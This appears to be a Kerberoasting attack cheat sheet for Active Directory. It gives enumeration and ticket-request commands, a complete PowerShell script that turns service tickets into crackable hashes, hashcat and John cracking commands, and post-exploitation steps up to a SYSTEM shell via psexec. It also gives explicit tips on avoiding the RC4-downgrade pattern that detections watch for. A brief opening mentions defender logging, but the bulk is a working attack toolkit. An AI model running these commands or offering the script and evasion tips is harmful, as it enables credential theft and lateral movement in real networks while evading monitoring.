
Overview

Kerberoasting requests TGS (service) tickets for accounts that have SPNs registered, then cracks them offline. The KDC encrypts the ticket's enc-part with the service account's long-term key (the NT hash for RC4-HMAC, a password-derived key for AES), so whoever holds a ticket can guess that account's password offline without ever contacting the service. Any authenticated domain principal can request a service ticket for any SPN; no special privileges are needed. Only user accounts are worth targeting: computer accounts also carry SPNs, but their passwords are long, random and rotated automatically. Every request is logged as Event ID 4769 on the DC, so a burst of requests, or RC4 (etype 0x17) tickets for AES-capable accounts, is what defenders look for.

Find Service Accounts (SPNs)

PowerShell (No Tools)

# Ships with Windows Server and with RSAT on workstations; lists every SPN, computer accounts included
setspn -Q */*
# Needs the ActiveDirectory module (RSAT); -ne "$null" is the filter idiom for "attribute is set"
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select Name, ServicePrincipalName

PowerView

Get-DomainUser -SPN | Select samaccountname, serviceprincipalname

Request TGS Tickets

PowerShell (No Tools)

# Built into .NET: asks the KDC for a service ticket for the SPN and caches it in the current logon session (visible with klist).
# This alone does not print anything crackable; the ticket must be parsed from GetRequest() or exported from memory (see below).
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db01.target.local:1433"
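The two "no tools" steps above stop short of producing something a cracker can eat. The following is an added example, not code from the original page: it enumerates user accounts with SPNs over LDAP with the built-in DirectorySearcher (no RSAT module), requests a service ticket for each with the same KerberosRequestorSecurityToken class, and parses the AP-REQ that GetRequest() returns into the $krb5tgs$ lines consumed by the Hashcat and John commands further down. It assumes a domain-joined Windows host and a session that already holds a TGT for any domain user; the function names (Get-SpnUsers, Get-KerberoastHash, Read-Der, Find-DerChild) are this example's own, not a library API.

```powershell
# Added example: LDAP enumeration + TGS request + AP-REQ parsing, all with built-in .NET.
# Assumes a domain-joined host with a valid TGT. Function names are this example's own.
Add-Type -AssemblyName System.IdentityModel

function Read-Der {
    # Decode one DER TLV at $Offset and return its tag plus content bounds.
    # Every tag met here (APPLICATION n, context [n], SEQUENCE, INTEGER, OCTET STRING,
    # GeneralString) fits in one byte, so multi-byte tags are not handled.
    param([byte[]]$Buf, [int]$Offset)
    $tag = $Buf[$Offset]
    $i   = $Offset + 1
    $len = [int]$Buf[$i]; $i++
    if ($len -band 0x80) {                      # long form: low 7 bits = number of length bytes
        $n = $len -band 0x7F; $len = 0
        for ($k = 0; $k -lt $n; $k++) { $len = ($len -shl 8) -bor $Buf[$i]; $i++ }
    }
    [pscustomobject]@{ Tag = $tag; Start = $i; End = $i + $len }
}

function Find-DerChild {
    # First TLV directly inside constructed node $Node whose tag byte equals $Tag.
    param([byte[]]$Buf, $Node, [byte]$Tag)
    $i = $Node.Start
    while ($i -lt $Node.End) {
        $c = Read-Der $Buf $i
        if ($c.Tag -eq $Tag) { return $c }
        $i = $c.End
    }
    throw ("DER tag 0x{0:X2} not found" -f $Tag)
}

function Get-SpnUsers {
    # Same query as Get-DomainUser -SPN, via System.DirectoryServices so no RSAT is needed.
    # objectCategory=person drops computer accounts; krbtgt and disabled accounts (UAC bit 2) are skipped.
    $s = New-Object DirectoryServices.DirectorySearcher
    $s.Filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)' +
                '(!(sAMAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $s.PageSize = 1000
    [void]$s.PropertiesToLoad.AddRange([string[]]('sAMAccountName', 'servicePrincipalName'))
    foreach ($r in $s.FindAll()) {
        [pscustomobject]@{
            SamAccountName = [string]$r.Properties['samaccountname'][0]
            Spn            = [string]$r.Properties['serviceprincipalname'][0]   # any one SPN of the account will do
        }
    }
}

function Get-KerberoastHash {
    param([string]$SamAccountName, [string]$Spn)
    $tok = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $Spn
    [byte[]]$b = $tok.GetRequest()
    # GetRequest() returns a GSS-API InitialContextToken: [APPLICATION 0] { OID 1.2.840.113554.1.2.2, TOK_ID 01 00, AP-REQ }
    # AP-REQ        ::= [APPLICATION 14] SEQUENCE { pvno [0], msg-type [1], ap-options [2], ticket [3], authenticator [4] }
    # Ticket        ::= [APPLICATION 1]  SEQUENCE { tkt-vno [0], realm [1], sname [2], enc-part [3] }
    # EncryptedData ::= SEQUENCE { etype [0] INTEGER, kvno [1] OPTIONAL, cipher [2] OCTET STRING }
    $gss    = Read-Der $b 0
    $oid    = Read-Der $b $gss.Start
    $apReq  = Read-Der $b ($oid.End + 2)                             # +2 skips TOK_ID
    $apSeq  = Read-Der $b $apReq.Start
    $ticket = Read-Der $b (Find-DerChild $b $apSeq 0xA3).Start
    $tSeq   = Read-Der $b $ticket.Start
    $realmN = Read-Der $b (Find-DerChild $b $tSeq 0xA1).Start
    $realm  = [Text.Encoding]::ASCII.GetString($b, $realmN.Start, $realmN.End - $realmN.Start)
    $encSeq = Read-Der $b (Find-DerChild $b $tSeq 0xA3).Start
    $etypeN = Read-Der $b (Find-DerChild $b $encSeq 0xA0).Start
    $etype  = 0
    for ($i = $etypeN.Start; $i -lt $etypeN.End; $i++) { $etype = ($etype -shl 8) -bor $b[$i] }
    $cipher = Read-Der $b (Find-DerChild $b $encSeq 0xA2).Start
    $hex    = ([BitConverter]::ToString($b, $cipher.Start, $cipher.End - $cipher.Start) -replace '-').ToLower()

    switch ($etype) {
        23 { # RC4-HMAC: first 16 bytes of the cipher field are the HMAC-MD5 checksum (hashcat -m 13100)
            '$krb5tgs$23$*{0}${1}${2}*${3}${4}' -f $SamAccountName, $realm, $Spn, $hex.Substring(0, 32), $hex.Substring(32)
        }
        { $_ -eq 17 -or $_ -eq 18 } { # AES: last 12 bytes are the HMAC-SHA1-96 checksum (hashcat -m 19600 / 19700).
            # For AES the user and realm fields are not decoration: the cracker derives the key salt
            # from them, so SamAccountName must match the account's exact case.
            $n = $hex.Length
            '$krb5tgs${0}${1}${2}$*{3}*${4}${5}' -f $etype, $SamAccountName, $realm, $Spn, $hex.Substring($n - 24), $hex.Substring(0, $n - 24)
        }
        default { throw "Unexpected etype $etype in ticket for $Spn" }
    }
}

# Roast every SPN user and write one line per account; a failed request (stale SPN, unreachable KDC) is a warning, not fatal.
Get-SpnUsers | ForEach-Object {
    try { Get-KerberoastHash -SamAccountName $_.SamAccountName -Spn $_.Spn }
    catch { Write-Warning "$($_.Exception.Message)" }
} | Set-Content -Path .\hashes.txt
```

The tickets are requested with whatever etypes the host negotiates, so AES-enabled accounts come back as etype 17 or 18 and land in the slower hashcat modes; nothing here downgrades to RC4, which keeps the 4769 log free of the etype 0x17 pattern that the Rubeus /tgtdeleg path produces.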

Rubeus

Rubeus.exe kerberoast /outfile:hashes.txt
Target a specific user:
Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt
Force RC4 tickets (far cheaper to crack than AES). /tgtdeleg obtains a TGT for the current user via the tgtdeleg trick and builds TGS-REQs that advertise only RC4, so AES-enabled accounts still come back as etype 23 if the DC allows it. This encryption downgrade is exactly what Kerberoasting detections key on; /rc4opsec uses the same trick but skips accounts that support AES, so no downgrade is logged:
Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

Impacket (Remote from Linux)

impacket-GetUserSPNs target.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt

Extract from Memory

Mimikatz

kerberos::list /export
Exports every ticket in the current logon session as a .kirbi file (sekurlsa::tickets /export pulls tickets from all sessions out of LSASS, but needs SYSTEM or debug privilege). Convert the service ticket to a crackable $krb5tgs$ line with kirbi2john.py, shipped in John's run/ directory:
kirbi2john.py ticket.kirbi > hash.txt

Crack TGS Hashes

Hashcat

# Type 23: RC4-HMAC ($krb5tgs$23$...). Fastest to crack by a wide margin; start with these lines
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# Type 17: AES128-CTS-HMAC-SHA1-96 ($krb5tgs$17$...). The realm (uppercase) and sAMAccountName (case-sensitive)
# in the line form the key-derivation salt, so they must be the account's real values, not placeholders
hashcat -m 19600 hashes.txt /usr/share/wordlists/rockyou.txt

# Type 18: AES256-CTS-HMAC-SHA1-96 ($krb5tgs$18$...), same salt rule as type 17
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt

John

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Post-Exploitation

With a cracked service account password, find out where the account is actually useful:
# Test the credentials against one host
crackmapexec smb TARGET -u svc_account -p 'CrackedPassword'

# Sweep a subnet; hosts where the account is local admin are marked (Pwn3d!)
crackmapexec smb SUBNET/24 -u svc_account -p 'CrackedPassword'

# Get a SYSTEM shell where it is admin
impacket-psexec target.local/svc_account:'CrackedPassword'@TARGET

Quick Reference

| Tool | Where | Notes |
| --- | --- | --- |
| setspn | Target (Windows) | Ships with Windows Server / RSAT, nothing to drop |
| KerberosRequestorSecurityToken | Target (Windows) | Built into .NET, requests the ticket with no tools |
| Rubeus | Target (Windows) | Most features, .NET |
| GetUserSPNs | Attacker (Linux) | Remote, needs creds |
| Mimikatz | Target (Windows) | Export from memory |